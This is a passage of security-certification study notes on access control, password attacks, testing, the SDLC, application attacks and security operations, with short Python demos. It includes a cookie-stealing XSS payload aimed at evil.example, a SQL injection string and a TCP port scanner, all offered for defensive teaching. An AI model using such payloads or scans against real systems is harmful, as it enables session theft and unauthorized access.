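        problems.append("no digit")
    if not any(c in string.punctuation for c in password):
        problems.append("no symbol")
    return problems   # an empty list means the password meets the complexity policy

print(check_password_policy("Tr0ub4dor&3x!"))   # []
print(check_password_policy("password"))        # several findings
```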
Controlling and Monitoring Access
Introducing Access Control Models
Discretionary Access Control A key characteristic of the Discretionary Access Control (DAC) model is that every object has an owner and the owner can grant or deny access to any other subjects.
Role-Based Access Control A key characteristic of the Role-Based Access Control (RBAC) model is the use of roles or groups. Instead of assigning permissions directly to users, user accounts are placed in roles and administrators assign privileges to the roles.
Rule-Based Access Control A key characteristic of the rule-based access control model is that it applies global rules to all subjects; a firewall is a common example. A rule-based access control model uses a set of rules, restrictions, or filters to determine what can and cannot occur on a system.
Attribute-Based Access Control A key characteristic of the Attribute-Based Access Control (ABAC) model is its use of rules that can include multiple attributes.
Mandatory Access Control A key characteristic of the Mandatory Access Control (MAC) model is the use of labels applied to both subjects and objects.
Privilege Escalation Privilege escalation refers to any situation that gives users more privileges than they should have.
Password Attacks
Dictionary Attack A dictionary attack is an attempt to discover passwords by using every possible password in a predefined database or list of common or expected passwords.
Brute-Force Attack A brute-force attack is an attempt to discover passwords by attempting all possible combinations of letters, numbers, and symbols.
Spraying Attack A spraying attack is a special type of brute-force attack. Attackers use spraying attacks in online password attacks, attempting to bypass account lockout security controls.
Birthday Attack A birthday attack focuses on finding collisions.
Rainbow Table Attack A rainbow table reduces cracking time by using large databases of precomputed hashes.
Mimikatz Some capabilities of Mimikatz: read passwords from memory, extract Kerberos tickets, extract certificates and private keys, read cleartext passwords in the Local Security Authority Subsystem Service (LSASS).
Core Protection Methods Control physical access to systems. Control electronic access to files. Hash and salt passwords. Use password masking. Deploy multifactor authentication. Use account lockout controls. Use last logon notification. Educate users about security.
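Since RBAC is the model interviewers most often ask candidates to describe, here is a minimal sketch of permissions attached to roles and roles attached to users; the role names and permissions are invented for illustration.

```python
# Minimal sketch of role-based access control: permissions attach to roles, users get roles.
ROLE_PERMISSIONS = {
    "helpdesk": {"reset_password", "view_ticket"},
    "dba":      {"read_db", "write_db", "backup_db"},
    "auditor":  {"read_db", "view_logs"},
}
USER_ROLES = {"alice": {"dba"}, "bob": {"helpdesk", "auditor"}}

def is_authorized(user: str, permission: str) -> bool:
    """A user is authorized if any of their roles grants the requested permission."""
    return any(permission in ROLE_PERMISSIONS.get(role, set())
               for role in USER_ROLES.get(user, set()))

print(is_authorized("bob", "view_logs"))   # True  (via the auditor role)
print(is_authorized("bob", "write_db"))    # False (no role grants it)
```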
Security Assessment and Testing
Security Testing Security tests verify that a control is functioning properly. These tests include automated scans, tool-assisted penetration tests, and manual attempts to undermine security.
Security Assessments Security assessments are comprehensive reviews of the security of a system, application, or other tested environment. The main work product of a security assessment is normally an assessment report that contains the results of the assessment in nontechnical language and concludes with specific recommendations for improving the security of the tested environment.
Security Audits Security audits use many of the same techniques followed during security assessments but must be performed by independent auditors. Security audits are performed with the purpose of demonstrating the effectiveness of controls to a third party. Auditors write reports that are intended for an organization's board of directors, government regulators, and other third parties.
Performing Vulnerability Assessments We need standards to provide a common language for describing and evaluating vulnerabilities. NIST provides us with the Security Content Automation Protocol (SCAP) to meet this need. SCAP provides this common framework for discussion and also facilitates the automation of interactions between different security systems.
CVE provides a naming system for describing security vulnerabilities.
CVSS provides a standardized system for describing the severity of security vulnerabilities.
CCE provides a naming system for system configuration issues.
CPE provides a naming system for operating systems, applications, and devices.
XCCDF provides a language for specifying security checklists.
OVAL provides a language for describing security testing procedures.
Vulnerability Scans There are four main categories of vulnerability scans:
Network discovery scanning uses a variety of techniques to scan a range of IP addresses, searching for systems with open network ports: TCP SYN scanning, TCP connect scanning, TCP ACK scanning, UDP scanning.
Network vulnerability scans go deeper than discovery scans. They don't stop with detecting open ports but continue on to probe a targeted system or network for the presence of known vulnerabilities.
Web vulnerability scanners are special-purpose tools that scour web applications for known vulnerabilities.
Database vulnerability scanners are tools that allow security professionals to scan both databases and web applications for vulnerabilities that may affect database security.
Penetration Testing A penetration test goes beyond vulnerability testing techniques because it actually attempts to exploit systems. Vulnerability scans merely probe for the presence of a vulnerability and do not normally take offensive action against the targeted system. The penetration testing process consists of four phases:
Planning includes agreement on the scope of the test and the rules of engagement. This is an extremely important phase because it ensures that both the testing team and management are in agreement about the nature of the test and that the test is explicitly authorized.
Information gathering and discovery uses manual and automated tools to collect information about the target environment. Testers also use automated tools during this phase to probe for system weaknesses using network vulnerability scans, web vulnerability scans, and database vulnerability scans.
Attack seeks to use manual and automated exploit tools to attempt to defeat system security.
This step is where penetration testing goes beyond vulnerability scanning, as vulnerability scans do not attempt to actually exploit detected vulnerabilities.
Reporting summarizes the results of the penetration testing and makes recommendations for improvements to system security.
White-Box Penetration Test Provides the attackers with detailed information about the systems they target.
Gray-Box Penetration Test Also known as partial knowledge tests, these are sometimes chosen to balance the advantages and disadvantages of white- and black-box penetration tests.
Black-Box Penetration Test Does not provide attackers with any information prior to the attack.
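As a concrete taste of network discovery scanning, here is a minimal TCP connect scan using only the standard library; the target host and port list are placeholders, and such scans should only ever be run against systems you are explicitly authorized to test.

```python
# Minimal sketch of TCP connect scanning: attempt a full handshake on each port.
import socket

def tcp_connect_scan(host: str, ports: list[int], timeout: float = 0.5) -> list[int]:
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:   # 0 means the full TCP handshake succeeded
                open_ports.append(port)
    return open_ports

print(tcp_connect_scan("127.0.0.1", [22, 80, 443, 3389]))
```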
Testing Your Software
Code Review and Testing Code reviews may result in approval of an application's move into a production environment, or they may send the code back to the original developer with recommendations for rework of issues detected during the review.
Static Testing Static application security testing (SAST) evaluates the security of software without running it by analyzing the source code. In mature development environments, application developers are given static analysis tools and use them throughout the design, build, and test process.
Fuzz Testing Fuzz testing software supplies invalid input to the software, either randomly generated or specially crafted to trigger known software vulnerabilities. The fuzz tester then monitors the performance of the application, watching for software crashes, buffer overflows, or other undesirable and/or unpredictable outcomes.
Misuse Case Testing In some applications, there are clear examples of ways that software users might attempt to misuse the application. For example, users of banking software might try to manipulate input strings to gain access to another user's account.
Test Coverage Analysis Test coverage = (number of use cases tested) / (total number of use cases). It estimates the degree of testing conducted against the new software.
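The fuzz-testing idea above can be sketched in a few lines: throw random strings at a function and flag anything that fails in an unexpected way. The parse_record() target below is a hypothetical stand-in for the software under test.

```python
# Minimal sketch of fuzz testing: feed random/malformed inputs and watch for unhandled failures.
import random, string

def parse_record(data: str) -> dict:
    """Hypothetical function under test: expects 'name:age'."""
    name, age = data.split(":")        # raises on malformed input
    return {"name": name, "age": int(age)}

def fuzz(iterations: int = 1000) -> None:
    alphabet = string.printable
    for _ in range(iterations):
        candidate = "".join(random.choice(alphabet) for _ in range(random.randint(0, 40)))
        try:
            parse_record(candidate)
        except (ValueError, TypeError):
            pass                        # expected rejection of bad input
        except Exception as exc:        # unexpected crash -> a finding worth investigating
            print("fuzzer found unhandled failure:", repr(candidate), exc)

fuzz()
```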
Systems Development Lifecycle
These core activities are essential to the development of secure systems:
Conceptual definition creating the basic concept statement for a system.
Functional requirements determination
Control specifications development
Design review you should analyze the system from a number of security perspectives.
Coding
Code review walk-through
System test review
Maintenance and change management
Lifecycle Models Choosing an SDLC model is normally the work of software development teams and their leadership. Cybersecurity professionals should ensure that security principles are integrated into the implementation of software development.
Waterfall Model The waterfall model is a development lifecycle consisting of a series of sequential (/sɪˈkwenʃl/) activities. The traditional waterfall model has seven stages of development; as each stage is completed, the project moves into the next phase: System Requirements, Software Requirements, Preliminary Design, Detailed Design, Code and Debug, Testing, and Operations and Maintenance. One of the major criticisms of this model is that it allows the developers to step back only one phase in the process. It does not make provisions for the discovery of errors at a later phase in the development cycle, which makes late corrections very costly.
Agile Software Development Among the many agile methodologies, the Scrum approach is the most popular. The Scrum methodology organizes work into short sprints of activity. These are well-defined periods of time, typically between one and four weeks, where the team focuses on achieving short-term objectives.
The change management process has three basic components:
Request Control The request control process provides an organized framework within which users can request modifications, managers can conduct cost/benefit analysis, and developers can prioritize tasks.
Change Control The change control process is used by developers to re-create the situation encountered by the user and to analyze the appropriate changes to remedy the situation. Change control includes conforming to quality control restrictions, developing tools for update or change deployment, properly documenting any coded changes, and restricting the effects of new code to minimize diminishment of security.
Release Control Once the changes are finalized, they must be approved for release through the release control procedure. An essential step of the release control process is to double-check and ensure that any code inserted as a programming aid during the change process (such as debugging code and/or backdoors) is removed before releasing the new software to production.
The DevOps Approach The word DevOps is a combination of Development and Operations, symbolizing that these functions must merge and cooperate to meet business requirements. The DevOps model aims to dramatically decrease the time required to develop, test, and deploy software changes. Some organizations even strive to reach the goal of continuous integration/continuous delivery (CI/CD), where code may roll out dozens or even hundreds of times per day.
Application Programming Interfaces APIs allow application developers to bypass traditional web pages and interact directly with the underlying service through function calls. Offering and using APIs creates tremendous opportunities for service providers, but it also brings some security risks. Developers must be aware of these challenges and address them when they create and use APIs. First, developers must consider authentication requirements.
APIs must also be tested thoroughly for security flaws, just like any web application.
Service-Level Agreements Using service-level agreements (SLAs) is an increasingly popular way to ensure that organizations providing services to internal and/or external customers maintain an appropriate level of service agreed on by both the service provider and the vendor. It's a wise move to put SLAs in place for any data circuits, applications, information processing systems, databases, or other critical components that are vital to your organization's continued viability. The following issues are commonly addressed in SLAs:
System uptime (as a percentage of overall operating time)
Maximum consecutive downtime (in seconds/minutes/and so on)
Peak load
Average load
Responsibility for diagnostics
Failover time (if redundancy is in place)
Service-level agreements also commonly include financial and other contractual remedies that kick in if the agreement is not maintained.
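Picking up the point that API consumers must handle authentication, here is a minimal sketch of a bearer-token API call with the third-party requests package; the URL, header scheme, and environment-variable name are hypothetical placeholders.

```python
# Minimal sketch of calling an API that requires authentication (pip install requests).
import os
import requests

API_BASE = "https://api.example.com"            # placeholder endpoint
token = os.environ.get("API_TOKEN", "dummy")    # never hard-code credentials in source

response = requests.get(
    f"{API_BASE}/v1/accounts",
    headers={"Authorization": f"Bearer {token}"},   # common bearer-token scheme
    timeout=10,
)
response.raise_for_status()        # fail loudly on authentication/authorization errors
print(response.json())
```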
Malicious Code and Application Attacks
Application Attacks
Buffer Overflows Buffer overflow vulnerabilities exist when a developer does not properly validate user input to ensure that it is of an appropriate size. Input that is too large can "overflow" a data structure to affect other data stored in the computer's memory.
Injection Vulnerabilities
These vulnerabilities allow an attacker to supply some type of code to the web application as input and trick the web server into either executing that code or supplying it to another server to execute.
SQL Injection Attacks The attacker is able to provide input to the web application and then monitor the output of that application to see the result.
Blind Content-Based SQL Injection In a content-based blind SQL injection attack, the perpetrator sends input to the web application that tests whether the application is interpreting injected code before attempting to carry out an attack. These blind techniques are reconnaissance tools for attackers before they actually attack.
Blind Timing-Based SQL Injection These attacks depend on delay mechanisms provided by different database platforms.
Code Injection Attacks These attacks seek to insert attacker-written code into the legitimate code created by a web application developer. Any environment that inserts user-supplied input into code written by an application developer may be vulnerable to a code injection attack.
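To make the injection mechanics tangible, the sketch below contrasts a query built by string concatenation with a parameterized query, using the standard-library sqlite3 module and a throwaway in-memory table; the table and payload are invented for illustration.

```python
# Minimal sketch contrasting an injectable query with a parameterized one.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

user_input = "' OR '1'='1"   # classic injection payload supplied as a "username"

# VULNERABLE: user input becomes part of the SQL text, changing the query's logic.
rows = conn.execute(
    "SELECT * FROM users WHERE username = '" + user_input + "'"
).fetchall()
print("concatenated query returned", len(rows), "row(s)")   # returns every user

# SAFE: a parameterized query treats the input strictly as data, not SQL.
rows = conn.execute("SELECT * FROM users WHERE username = ?", (user_input,)).fetchall()
print("parameterized query returned", len(rows), "row(s)")  # returns 0 rows
```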
Exploiting Authorization Vulnerabilities
Injection vulnerabilities allow an attacker to send code to systems, and authentication vulnerabilities allow an attacker to assume the identity of a legitimate user. Authorization vulnerabilities allow an attacker to exceed the level of access for which they are authorized.
Directory Traversal Directory traversal attacks work when web servers allow attackers to navigate the directory structure and file system on the server.
Exploiting Web Application Vulnerabilities
Web applications are complex ecosystems consisting of code, web platforms, operating systems, databases, and APIs.
Cross-Site Scripting (XSS) Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page. Variants include reflected XSS and stored/persistent XSS.
Cross-Site Request Forgery (CSRF/XSRF) CSRF attacks are similar to XSS attacks but exploit a different trust relationship. XSS attacks exploit the trust that a user has in a website to execute code on the user's computer. CSRF attacks exploit the trust that remote sites have in a user's system to execute commands on the user's behalf.
Session Hijacking Session hijacking attacks occur when an attacker intercepts part of the communication between an authorized user and a resource and then uses a hijacking technique to take over the session and assume the identity of the authorized user.
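One common XSS defense is output encoding: HTML-escape untrusted input before reflecting it into a page. The sketch below uses the standard library's html.escape; the comment string is an illustrative attack payload.

```python
# Minimal sketch of output encoding as an XSS mitigation.
import html

untrusted_comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

safe_fragment = html.escape(untrusted_comment)
page = f"<p>Latest comment: {safe_fragment}</p>"
print(page)   # the payload renders as inert text instead of executing in the browser
```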
Application Security Controls
Input Validation Applications that accept user input should perform validation of that input to reduce the likelihood that it contains an attack. Input validation is useful in protecting against SQL injection attacks.
Web Application Firewalls
Database Security: Parameterized Queries and Stored Procedures With a parameterized query, the developer prepares a SQL statement and then allows user input to be passed into that statement. Stored procedures work in a similar manner, but the major difference is that the SQL code is not contained within the application but is stored on the database server.
Tokenization replaces personal identifiers that might reveal an individual's identity with a unique identifier using a lookup table.
Hashing uses a cryptographic hash function to replace sensitive identifiers with an alternative identifier.
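A minimal allow-list input-validation sketch follows; the field rules (username pattern, age range) are illustrative assumptions, and in practice validation complements rather than replaces parameterized queries.

```python
# Minimal sketch of allow-list input validation before data reaches a query or command.
import re

USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")   # allow-list: letters, digits, underscore

def validate_registration(username: str, age: str) -> list[str]:
    errors = []
    if not USERNAME_RE.fullmatch(username):
        errors.append("username contains disallowed characters or bad length")
    if not (age.isdigit() and 13 <= int(age) <= 120):
        errors.append("age must be a number between 13 and 120")
    return errors

print(validate_registration("alice_01", "30"))                     # []
print(validate_registration("alice'; DROP TABLE users;--", "x"))   # both checks fail
```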
Applying Security Operations Concepts
Need to Know and Least Privilege The need-to-know principle imposes the requirement to grant users access only to data or resources they need to perform assigned work tasks. The least privilege principle states that subjects are granted only the privileges necessary to perform assigned work tasks and no more.
Separation of Duties (SoD) and Responsibilities Separation of duties (SoD) and responsibilities ensures that no single person has total control over a critical function or system.
Job Rotation Job rotation (sometimes called rotation of duties) means that employees rotate through jobs or rotate job responsibilities with other employees.
Mandatory Vacations Mandatory vacations provide a form of peer review and help detect fraud and collusion.
Preventing and Responding to Incidents
Intrusion Detection and Prevention Systems Intrusion detection systems (IDSs) and intrusion prevention systems (IPSs) are two methods organizations typically implement to detect and prevent attacks. An intrusion detection system (IDS) automates the inspection of logs and real-time system events to detect intrusion attempts and system failures. IDSs can use knowledge-based (signature-based) and/or behavior-based detection and can be host-based or network-based. An intrusion prevention system (IPS) is a special type of active IDS that attempts to detect and block attacks before they reach target systems.
Honeypots and Honeynets Honeypots are individual computers created as a trap for intruders or insider threats. A honeynet is two or more networked honeypots used together to simulate a network.
Sandboxing Sandboxing provides a security boundary for applications and prevents the application from interacting with other applications.
Firewalls Firewalls include rules within an ACL to allow specific traffic and end with an implicit deny rule.
Logging Use logs to re-create events leading up to and during an incident; it's important to protect log files against unauthorized access and unauthorized modification. It's common to store copies of logs on a central system, such as a security information and event management (SIEM) system, to protect them. SIEMs provide centralized logging and real-time analysis of events occurring on systems throughout an organization.
Security orchestration (/ˌɔːrkɪˈstreɪʃn/), automation, and response (SOAR) refers to a group of technologies that allow organizations to respond to some incidents automatically. SOAR allows security administrators to define these incidents and the response, typically using playbooks and runbooks:
Playbook A playbook is a document or checklist that defines how to verify an incident. Additionally, it gives details on the response. A playbook for a SYN flood attack would list the same actions security administrators take to verify a SYN flood is under way. It would also list the steps administrators take after verifying it is a SYN flood attack.
Runbook A runbook implements the playbook data into an automated tool. For example, if an IDS alerts on the traffic, it implements a set of conditional steps to verify that the traffic is a SYN flood attack using the playbook's criteria. If the IDS confirms the attack, it then performs specified actions to mitigate the threat.
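To illustrate the "allow specific traffic, end with an implicit deny" behavior of a firewall ACL mentioned above, here is a minimal rule-evaluation sketch; the rule set is invented for demonstration.

```python
# Minimal sketch of evaluating a firewall ACL: rules are checked in order, the first match
# wins, and anything not explicitly allowed falls through to an implicit deny.
RULES = [
    {"action": "allow", "proto": "tcp", "port": 443},   # HTTPS to the web tier
    {"action": "allow", "proto": "tcp", "port": 22},    # SSH from the management network
    {"action": "deny",  "proto": "udp", "port": 69},    # explicitly block TFTP
]

def evaluate(proto: str, port: int) -> str:
    for rule in RULES:
        if rule["proto"] == proto and rule["port"] == port:
            return rule["action"]
    return "deny"          # implicit deny: no matching rule means the traffic is dropped

print(evaluate("tcp", 443))   # allow
print(evaluate("tcp", 8080))  # deny (implicit)
```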